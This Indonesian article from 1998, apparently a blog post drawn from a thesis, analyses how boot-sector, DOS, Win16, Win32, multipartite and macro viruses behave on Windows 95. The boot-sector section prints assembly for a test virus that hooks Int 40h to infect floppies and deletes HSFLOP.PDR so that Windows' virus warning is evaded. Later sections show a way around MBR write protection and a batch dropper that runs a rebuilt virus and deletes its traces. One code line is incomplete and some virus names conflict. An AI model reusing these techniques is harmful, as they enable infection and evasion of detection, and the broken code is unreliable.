Virus dan Windows 95

Pada artikel ini kita akan melihat lebih jauh jalannya virus pada Windows 95. Masing-masing bahasan berdasarkan jenis-jenis virus. Catatan, artikel ditulis pada 16 Januari 1998.

Berikut pembagian 6 jenis virus pada Windows 95.

1. Virus Boot Sector

Seperti kita ketahui, proses pemuatan (loading) Win95 tidak banyak berubah seperti halnya Win3.x. Win95 masih membutuhkan DOS dalam proses ini. Hal ini untuk menjaga kompatibilitas dengan sistem DOS. Dengan demikian, perangkat lunak yang bekerja baik pada DOS, tetap berfungsi baik pada Win95.

Virus boot sector (VBS) aktif pada saat sistem operasi (SO) belum beroperasi. Hal ini disebabkan VBS bekerja secara level BIOS, tidak level SO. Setiap komputer IBM PC atau kompatibelnya memiliki ROM BIOS masing-masing. Walaupun terjadi perubahan drastis pada level SO, namun dari segi BIOS tidaklah berubah banyak. Oleh sebab itu cara kerja VBS bisa dikatakan ‘statis’ karena BIOS yang sifatnya tetap. Pada skripsi ini istilah BIOS kita nyatakan sebagai fungsi-fungsi yang terdapat pada ROM BIOS.

Pada setiap SO memiliki cara kerja masing-masing. Biasanya BIOS dalam hal ini hanya berfungsi dalam proses loading kernel SO tersebut, atau biasa disebut booting. Setelah SO tersebut termuat, fungsi-fungsi BIOS tidak lagi banyak digunakan. Mungkin ada perkecualian pada SO yang sederhana, seperti MS-DOS, yang hanya perluasan dari fungsi-fungsi BIOS. Ada kalanya BIOS tetap digunakan bila ada masalah dalam hal kompatibilitas. Karena komputer terdiri dari banyak perangkat, yang tentu tidak selalu didukung oleh SO, maka BIOS biasanya digunakan untuk mengatasi hal ini. Pada sistem operasi modern biasanya telah memiliki mekanisme input/output tesendiri, tidak lagi bergantung pada BIOS.

Pada Win95 setiap device diwakili oleh tiap-tiap VxD. Jadi misalnya kita ingin mengakses hard disk atau floppy disk, maka itu diwakili oleh masing-masing VxD. Tidak lagi ada peran BIOS dalam hal ini. Mengenai VxD akan dibahas pada artikel tersendiri.

Virus Boot Sector bekerja melalui manipulasi fungsi pada BIOS. Misalnya bila kita ingin membaca suatu disket, maka VBS memanfaatkannya untuk menularkan kode-kode programnya. Pada sistem DOS yang masih bergantung pada BIOS, VBS berfungsi normal dan dapat menjalankan aksinya. Pada Win95 yang berbasis VxD keadaan (seharusnya) menjadi lain. VBS diharapkan tidak dapat aktif, mengingat pengolahan disk tidak lagi melewati BIOS.

Untuk mengetahui aktivitas VBS maka penulis mencoba mengaktifkan sebuah virus pada Windows 95. Pertama-tama penulis ganti setup CMOS agar memboot dari drive A:. Pada drive A: penulis siapkan disket yang telah mengandung sebuah virus boot sector, yang dikenal oleh antivirus sebagai virus Stoned.Angelina. Lalu penulis melakukan boot komputer. Berikut urut-urutan kegiatan yang terjadi.

  1. BIOS melakukan boot, dimulai dengan membaca sistem pada drive A.
  2. Karena drive A: tidak memiliki rutin sistem, maka selanjutnya proses boot dimulai dari drive C.
  3. Drive C: memiliki sistem, dan terjadi proses pemuatan sistem, yang ditandai dengan tampilan ‘Loading Windows 95 …’.
  4. Beberapa saat kemudian modus grafis sistem operasi muncul, dan dikuti oleh kotak dialog sebagai berikut: “WARNING: Your computer may have a virus. The Master Boot Record on your computer has been modified. Would you like to see more information about this problem?”
  5. Informasi lebih lanjut menjelaskan beberapa hal yang mungkin muncul akibat adanya hal-hal yang tidak normal pada sistem.
  6. Sistem operasi berjalan seperti biasa namun dengan unjuk kerja yang lebih rendah.

Hal yang menarik perhatian adalah adanya peringatan tentang kemungkinan terdapatnya virus pada sistem. Ini cukup menarik karena dengan munculnya peringatan tersebut setidaknya pemakai menyadari ada yang tidak beres dengan sistemnya dan mengadakan perbaikan secepatnya. Dikatakan secepatnya karena pada booting yang kedua Win95 tidak memunculkan kotak peringatan tersebut.

Pengecekan system performance menunjukkan bahwa Win95 bekerja pada MS-DOS compatibility mode. Hal ini berarti Win95 tetap menggunakan mekanisme Int 13h untuk melakukan akses pada disk sehingga memungkinkan suatu virus VBS untuk tetap aktif. Namun tetap aktif tidak otomatis membuat virus mampu menyebarkan kodenya.

Win95 memecah akses hard disk dan disket pada VxD yang berbeda. Ketika VBS aktif (akses ke hard disk melalui Int 13h), ternyata akses ke disket tetap melewati VxD. Penulis mencoba mengakses disket ketika virus Stoned.Angelina aktif, dan terbukti bahwa disket yang diakses (ketika diperiksa kemudian) tidak mengandung virus tersebut. Keadaan ini dapat menurunkan secara drastis penyebaran virus boot sector.

Meskipun virus Stoned.Angelina sendiri adalah VBS yang sederhana, tetapi hal ini mencakup sebagian besar inti proses kerja VBS sehingga bisa dianggap mewakili sebagian besar VBS yang lain, terutama yang dibuat sebelum adanya Windows 95. Namun kita tahu bahwa virus komputer bersifat fleksibel, selalu mengikuti perkembangan keadaan. Terbukti kemudian dengan munculnya virus Hare yang mampu menghindari munculnya kotak peringatan, sekaligus mampu menulari disket pada sistem Windows 95.

Untuk mengetahui sejauh mana Win95 memastikan perlunya ‘DOS compatibility mode’ (DCM) maka penulis mengadakan beberapa percobaan. Penulis melihat mode ini hanya berkaitan dengan operasi disk, karena itu fokus hanya diutamakan pada Int 13h (rutin BIOS untuk operasi disk) dan hubungannya dengan Windows 95. Dari beberapa percobaan tersebut dapat ditarik suatu kesimpulan berikut.

  1. Pada saat inisialisasi sistem Win95 memberikan kesempatan pada program-program yang menetap di memori (baik driver maupun program normal) untuk menginisialisasi rutin VxD-nya. Hal ini dilakukan lewat mekanisme Int 2Fh. Lihat lampiran program.
  2. Bila suatu program memodifikasi vektor 13h tetapi tidak memiliki rutin VxD, maka Win95 akan aktif pada DCM.
  3. Pemeriksaan vektor 13h dilakukan pada program yang berakhir menetap (resident) melalui fungsi-fungsi yang normal. Suatu program yang ‘mencuri’ alokasi memori secara tidak wajar, meskipun kemudian memodifikasi vektor 13h, ternyata tidak menyebabkan Win95 aktif pada DCM. Lihat lampiran program.
  4. Pengecekan vektor 13h selalu dilakukan secara konvensional (melalui tabel interrupt, khususnya alamat 0000h:004Ch untuk vektor 13h). Pengecekan INT BIOS 13h sebelum DOS aktif dilakukan pada saat boot real-mode DOS. Bila tidak mengarah ke ROM BIOS atau memiliki pengenal khusus, maka Win95 akan aktif pada DCM.

Dari simpulan di atas, untuk menghindari Win95 aktif pada DCM maka suatu VBS (yang aktif pada level BIOS) dapat melakukan hal berikut.

  1. Melakukan pencegatan Int 13h sesudah sistem DOS selesai diinisialisasi. Hal ini biasa bagi virus yang multipartit (mampu menyebar pada boot sector dan file), yaitu melalui pencegatan bertahap. Misal dengan pencegatan vektor 1Ch (timer tick), memonitor tersedianya DOS (Int 21h), dan mencegat Int 13h ketika DOS sudah tersedia.
  2. Tidak mencegat Int 13h namun Int 40h (fungsi-fungsi BIOS untuk operasi disket). Dalam BIOS IBM PC atau kompatibelnya, Int 13h selalu bercabang ke Int 40h bila melakukan operasi disket.
  3. Dengan memanipulasi sedemikian rupa sehingga seakan-akan Int 13 masih asli dari BIOS (Segment=0F000h). Seperti virus Compback yang mencari byte ‘CD XX’ (dalam assembly berarti INT XX) pada ROM, dan hanya mencegat pointer yang ditunjuk oleh INT XX. Jadi: IVT –> INT XX –> Virus. Hasilnya segment awal virus adalah 0F000h.

Untuk membuat akses ke disket tetap menyebarkan virus, hal yang terutama adalah dalam pemanipulasian akses VxD yang berhubungan dengan operasi disket. VxD untuk ini bernama HSFLOP.PDR, dan berada dalam path C:\WINDOWS\SYSTEM\IOSUBSYS\. Untuk membuat akses VxD ini dalam kendali dapat dilakukan 2 hal berikut.

  1. Membuat VxD sejenis untuk menggantikan VxD yang sudah ada. VxD yang baru ini memanipulasi fungsi-fungsi untuk dapat menyebarkan rutin virus.
  2. Menonaktifkan VxD (HSFLOP.PDR) yang ada. Hal ini bisa dengan menghapus atau mengganti namanya.

Kombinasi penghindaran DCM dan penonaktifan HSFLOP.PDR membuat suatu VBS mampu aktif menyebar pada sistem Windows 95 tanpa menimbulkan kecurigaan pada pemakainya. Untuk pengujian ini bisa dilihat pada lampiran program. Inti dari program tersebut dapat dijelaskan sebagai berikut.

  1. Ketika proses boot dimulai, ROM BIOS membaca sektor awal (MBR) dari hard disk (sektor 1, sisi 0, track 0) dan meletakkannya dalam lokasi memori 0000h:7C00h. Lalu rutin boot MBR tersebut dijalankan.

  2. Program pada MBR memindah kode dirinya ke alamat 0000h:0600h, karena lokasi 0000h:7C00h akan digunakan untuk memuat DBR.

      cli
      xor ax,ax     ;ss,es,ds=0
      mov ss,ax
      mov es,ax
      mov ds,ax
      mov sp,7C00h  ;sp=7C00h
      mov si,sp
      sti
      cld
      mov di,600h
      mov cx,100h   ;sebesar 512 byte
      repz movsw    ;0h:7C00h --> 0000h:0600h
      db 0EAh       ;lompat ke 0h:600h+Loc_2
      dw 600h+offset Loc_2,0
    Loc_2:
  3. Dilakukan ‘pencurian’ 1 Kb memori konvensional, yaitu dengan mengurangi besar memori tersedia yang tercatat pada BDA (BIOS Data Area) 0040h:0413h. Dilanjutkan dengan menyalin rutin boot MBR pada lokasi memori konvensional yang didapat.

    mov si,0413h
    dec word ptr [si] ;kurangi mem konv 1 Kb
    mov ax,[si]
    mov cl,6
    shl ax,cl         ;hitung lokasi segment
    mov es,ax
    xor di,di
    mov si,600h
    mov cx,100h
    repz movsw    ;pindahkan 0:600h --> top mem konv
  4. Mencegat dan memanipulasi Int 40h. Untuk tahap sederhana hanya berupa pencegatan fungsi baca disket (02h) yang digunakan untuk merubah volume serial number menjadi ‘CABE-1003’.

      mov di,offset Int13A+1
      mov ax,offset Int13h
      xchg ds:[40h*4],ax ;ganti vektor 40h
      stosw
      mov ax,es
      xchg ds:[40h*4+2],ax
      stosw
      . . .
    Int13h:
      cmp ax,0201h ;baca 1 sektor?
      jnz Int13A
      or dx,dx ;drive=A: dan sisi=0?
      jnz Int13A
      cmp cx,0001h ;sektor=1 dan track=0?
      jnz Int13A
      pushf
      call dword ptr cs:Int13A+1 ;panggil fungsi baca asli
      jc Int13B
      push ax
      mov ax,
      xchg word ptr es:[bx+27h],ax
      cmp ax,1003h ;cek sudah tercemar
      jz Int13C
      mov word ptr es:[bx+29h],0CABEh
      mov ax,0301h
      pushf
      call dword ptr cs:Int13A+1 ;tulis DBR tercemar
  5. Karena perlu untuk menghapus file HSFLOP.PDR sedangkan DOS belum tersedia, maka diperlukan mekanisme untuk memonitor kapan DOS siap untuk digunakan. Program ini mencegat Int 15h (fungsi BIOS untuk keperluan sistem) fungsi 0C0h (baca konfigurasi sistem) untuk memonitor vektor DOS (Int 21h).

      mov di,offset Int15A+1
      mov ax,offset Int15h
      xchg ds:[15h*4],ax ;ganti vektor 15h
      stosw
      mov ax,es
      xchg ds:[15h*4+2],ax
      stosw
      mov word ptr ds:[21h*4],-1 ;kasih tanda vektor 21h
      . . .
    Int15h:
      cmp ah,0C0h ;baca konfig sistem?
      jnz Int15A
      push ds, ax, dx
      xor ax,ax
      mov ds,ax
      cmp word ptr ds:[21h*4],-1 ;vektor 21h berubah?
      jz Int15B
      mov byte ptr cs:Int15h+3,0EBh ;tidak gunakan rutin ini lagi
      mov ah,41h
      push cs
      pop ds
      mov dx,offset FileHapus
      int 21h ;hapus file HSFLOP.PDR Int15B:
      pop dx, ax, ds
    Int15A:
      db 0EAh
      dw 0,0
  6. Selanjutnya dilakukan pengecekan pada tabel partisi untuk mencari lokasi DBR yang dapat diboot. Setelah DBR dimuat maka pelaksanaan instruksi dialihkan pada rutin boot DBR tersebut.

Kita bisa melihat bahwa perlindungan Win95 terhadap VBS cukup lemah, walaupun telah menyertakan kemampuan mendeteksi perubahan Int 13h. Peringatan yang yang berbunyi ‘The Master Boot Record on your computer has been modified’ hanya merupakan pesan secara umum, yang terjadi dari analisa perubahan Int 13h. Kenyataannya tidak ada proses perbandingan antara MBR lama dengan MBR saat ini.

2. Virus File DOS

Windows 95 memberikan kompatibilitas pada program berbasis DOS untuk tetap jalan pada Win95. Untuk keperluan ini Win95 memberikan lingkungan operasi yang sedapat mungkin serupa seperti lingkungan DOS aslinya. Seperti kita tahu bahwa DOS beroperasi pada real-mode (RM) yang berarti segala akses dilakukan secara fisik, sedangkan Win95 beroperasi pada protected-mode (PM), yaitu segala akses dilakukan secara virtual.

Win95 memberikan kemungkinan banyak program untuk diaktifkan secara bergantian maupun bersama-sama. Bila dikaitkan dengan DOS, yang hanya memungkinkan 1 program aktif pada satu waktu, dapat terjadi suatu konflik tersendiri bila tidak diantisipasi secara benar. Program-program DOS agar dapat berjalan secara lancar pada Win95 harus menyadari kemungkinan bahwa ia tidak sendiri berada sistem.

Virus file, sebagaimana program DOS lainnya, tetap berfungsi dengan baik bila beroperasi secara wajar. Untuk melihat aktivitas virus file pada Win95, penulis mencoba 4 buah virus file, yaitu Spanska.4250, Diehard2.4000, Serbu.3493 dan TPVO.3464.

Dari aktivitas virus-virus ini bisa penulis simpulkan sebagai berikut.

  1. Virus Spanska.4250 mampu menular pada ‘DOS Box’. File program DOS yang dieksekusi terbukti dapat terinfeksi oleh virus ini. Virus Diehard2.4000 tidak jalan pada ‘DOS Box’. Hal ini disebabkan karena virus ini menolak aktif bila dijalankan di bawah Windows. Virus Serbu.3322 mampu menular pada ‘DOS Box’, tetapi fasilitas stealth-nya hilang. TPVO.3364 gagal untuk bekerja. Win95 memberikan peringatan ‘invalid instruction’ dan membatalkan seluruh sesi DOS.
  2. Keaktifan virus hanya terjadi pada ‘DOS Box’ mana dia bekerja. Pembukaan ‘DOS Box’ yang lain menunjukkan bahwa fungsi-fungsi berjalan normal (tidak dimanipulasi).
  3. Bila virus-virus diaktifkan sebelum Win95 dimuat (saat real-mode DOS), terbukti bahwa seluruh virus tetap dapat menular pada saat Win95 protected-mode sudah berjalan.
  4. Beberapa operasi file dipetakan ulang dari rutin DOS RM. Virus seperti Diehard2.4000 yang mampu menular lewat operasi file ternyata tidak berfungsi pada Win95 PM. Namun bila suatu TSR melakukan pencegatan itu pada ‘DOS Box’ maka rutin manipulasi tetap berjalan.
  5. Pada ‘DOS Box’ tidak satupun virus menulari file program berbasis Windows, meskipun virus tersebut tidak membedakan antara .EXE DOS dan .EXE Windows. Pada DOS RM virus seperti Diehard.4000 juga menulari file program Windows.

3. Virus Win16

Win16 adalah model pemrograman pada Windows 3.x. Karena berbasis 16 bit, program Win16 terdiri dari banyak segment (segmented), dan diaktifkan pada lingkungan protected-mode 16 bit. Win95 mendukung program berbasis Win16, yang dijalankan pada lingkungan yang serupa dengan Win 3.x.

Untuk dapat membuat virus berbasis Win16, secara garis besar terdiri dari 3 syarat.

  1. Mengetahui struktur program Win16 (NE). Struktur program jenis NE (.EXE dan .DLL) dapat dilihat pada lampiran. Struktur ini mencerminkan tipe program yang bersegment.
  2. Mempunyai akses terhadap sistem operasi. Salah satu hal yang membantu operasi virus pada Win16 adalah masih tersedianya pemrograman menggunakan interrrupt (Int). Dengan menggunakan Int dan fungsi-fungsi tertentu, tidak dibutuhkan tabel alamat atau sejenisnya untuk melakukan suatu fungsi. Selain Int kompatibel DOS, Win16 juga memberikan fasilitas DPMI untuk fungsi-fungsi PM.
  3. Mengetahui pemrograman pada Win16. Pemrograman PM 16 bit jauh berbeda dengan RM. Hal yang terutama yaitu pengaturan akses sumber daya berbasiskan segment, yang biasa dinamakan selektor. Pengalamatan memori berbentuk Selektor:Offset dan beroperasi secara virtual.

Untuk analisa virus penulis hanya memiliki 1 contoh virus, yaitu virus Tentacle.1958. Virus ini tidak menetap dan bekerja secara sederhana dalam menulari file program, yaitu dengan mencari seluruh program .EXE pada direktori yang aktif atau pada direktori C:\WINDOWS, dan menginfeksinya. Seluruh operasi file menggunakan fungsi-fungsi DOS normal.

Windows adalah SO yang terbuka. Walaupun suatu program dikatakan beroperasi pada lingkungan yang terlindung, tetapi tetap disediakan fungsi-fungsi untuk membuka perlindungan tersebut. Seperti, suatu selektor dengan akses hanya baca, dapat dibuatkan selektor alias dengan akses baca/tulis. Keterbukaan sistem bisa menimbulkan efek berbahaya bila disalahgunakan.

Dari pengamatan penulis terhadap dokumentasi virus-virus Win16[1], terlihat bahwa hampir seluruhnya bekerja secara sederhana, yaitu cari dan tularkan. Bila pada virus DOS sebagian besarnya adalah menetap, maka pada virus Win16 justru kebalikannya. Proses resident melalui program tampaknya merupakan hal yang sulit.

4. Virus Win32

Pada Win95 mulai banyak dipergunakan model pemrograman 32 bit. Ini tidak terlepas dari Win95 yang merupakan SO 32 bit.

Seperti halnya Win16, pada untuk dapat membuat virus pada Win32 diperlukan 3 syarat mendasar.

  1. Mengetahui struktur program Win32 (PE dan LE). Struktur program jenis PE (.EXE dan .DLL) dan LE (.VXD) dapat dilihat pada lampiran. Struktur ini mencerminkan tipe program yang linear (flat). Struktur program Win32s tergolong rumit dan tidak terdokumentasi secara lengkap.
  2. Mempunyai akses terhadap sistem operasi. Hal membuat sulit operasi virus pada Win32 adalah cara pemanggilan fungsi, yaitu berdasarkan alamat yang diset langsung oleh sistem operasi. Tidak lagi disediakan metode Interrupt untuk pemanggilan fungsi. Untuk suatu rutin program yang disisipkan, pengaturan tabel relokasi fungsi atau alamat adalah suatu proses yang cukup rumit.
  3. Mengetahui pemrograman pada Win32. Pemrograman 32 bit PM secara akses mirip dengan pemrograman 16 bit PM, hanya menggunakan intruksi, pengalamatan, dan register 32 bit. Parameter-parameter yang digunakan untuk memanggil suatu fungsi menggunakan basis 32 bit.

Untuk keperluan analisa penulis hanya memiliki 1 buah virus, yaitu Win95.Boza, yang dikabarkan merupakan virus pertama yang menyerang file program pada Windows 95. Seperti halnya virus Tentacle.1958, virus ini juga menggunakan cara sederhana untuk menginfeksi program, yaitu cari dan tularkan. Sayangnya virus ini banyak memiliki kelemahan dan seringkali mengakibatkan kerusakan pada program yang diinfeksinya.

5. Virus Multipartit

Virus multipartit merupakan virus yang mampu menginfeksi lebih dari 1 media. Virus jenis ini tak lebih merupakan gabungan dari virus-virus dari jenis yang berbeda, seperti virus file dan virus boot sector. Upaya penggabungan ini bertujuan untuk memperluas kemungkinan penyebaran virus.

Untuk keperluan analisa penulis mengamati proses kerja virus Hare.7786. Virus ini menyerang file-file program DOS dan boot sector, bersifat resident, dan polimorfik. Ada hal menarik yang didapat dari virus ini, yaitu penginfeksian MBR pada saat ‘DOS Box’. Win95 secara khusus memberikan perlindungan terhadap penulisan MBR dan DBR. Hal ini bisa dilihat pada pemakaian utiliti semacam Disk Editor dari Norton Utility. Namun dengan trik tertentu ternyata proteksi ini dapat dilewati, yang bahkan sekaligus melewati fasilitas ‘Virus Warning’ pada ROM BIOS karena Win95 menggunakan akses langsung disk melalui VxD.

Pada PM tabel interrupt tidak lagi berada pada alamat fisik 00000000h, tetapi dipetakan melalui IDT (Interrupt Descriptor Table). Win95 hanya melindungi penulisan MBR bila itu dilakukan melalui instruksi INT 13h, namun tidak bila melalui pemanggilan alamat fungsi.

mov ax,0301h ;tulis 1 sektor
mov bx,offset Sektor ;sektor yang ditulis
mov cx,0001h ;track 0, sektor 1
mov dx,0080h ;sisi 0, hard disk 0
int 13h ; ---> DITOLAK
. . .
mov ax,3521h
int 21h ;ambil alamat Int 13h (ES:BX)
pushf ;simulasikan interrupt
call dword ptr es:[bx] ; ---> DITERIMA

6. Virus File Dokumen

Virus jenis ini tidak berkait dengan sistem operasi, tetapi lebih kepada aplikasi yang mendukungnya. Kalaupun suatu virus dokumen mampu untuk mempengaruhi sistem secara umum, hal itu tidak lebih dari kemampuan makro dari aplikasi. Kenyataannya memang integrasi makro dengan sistem semakin ditingkatkan, sehingga kemampuan virus jenis ini menjadi kian meningkat.

Dari pengamatan terhadap dokumentasi virus-virus makro yang ada, ada kecenderungan bahwa virus jenis ini dapat berfungsi sebagai pembawa virus lainnya. Dengan memanfaatkan utiliti semacam DEBUG.EXE, virus makro dapat menciptakan file .EXE/.COM yang lain dan menjalankannya. Dari eksekusi tersebut terbuka kesempatan sangat luas melakukan kegiatan lainnya. Berikut beberapa langkah untuk melakukan hal tersebut.

  1. Membuat sebuah file berisi hexadesimal dump virus, misal: VIRUS.SCR.
  2. Membuat file .BAT untuk proses konversi, misal:
  3. @echo off

    debug < virus.scr > nul

    virus.com

    del virus.scr

    del virus.com

  4. Menjalankan file .BAT tersebut.

Referensi

[1] Eugene Kaspersky, AVP Virus Encyclopedia v1.3, KAMI Ltd, 1992-97.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s